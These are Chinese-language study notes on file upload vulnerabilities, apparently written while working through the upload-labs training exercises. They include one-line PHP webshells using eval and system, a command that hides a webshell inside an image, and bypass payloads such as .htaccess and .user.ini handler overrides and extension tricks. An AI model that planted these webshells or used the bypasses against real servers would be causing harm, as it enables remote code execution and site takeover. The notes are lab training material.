文件上传漏洞 文件上传功能:头像更改、发邮件、上传资料
1、利用文件上传功能上传恶意文件:一句话木马文件、反弹shell的exe 2、上传文件的路径可访问 3、上传文件所在的路径具备可执行权限
一句话木马 传参方式:POST GET REQUEST <?php @eval($_POST['c']);?> @:防报错 eval() 代码执行函数
<?php @system($_POST['c']);?>
copy a.jpg/b muma.php/a muma.jpg
文件上传漏洞 直接文件上传
upload-labs: 第一关前端过滤 禁用js 修改后缀 第二关文件类型过滤 黑名单过滤 第三关畸形后缀名--php php3 php4 php5 phtml 第四关.htaccess <FilesMatch "png"> SetHandler application/x-httpd-php </FileMatch> 第五关.user.ini auto_prepend_file=muma.jpg auto_append_file=muma.jpg readme.php 第六关大小写绕过 windows特性绕过--目标服务器为Windows服务器 第七关后缀加空格 '.php '-->.php 第八关后缀加. .php. -->.php 第九关后缀加::$DATA 第十关后缀加. . 第十一关双写绕过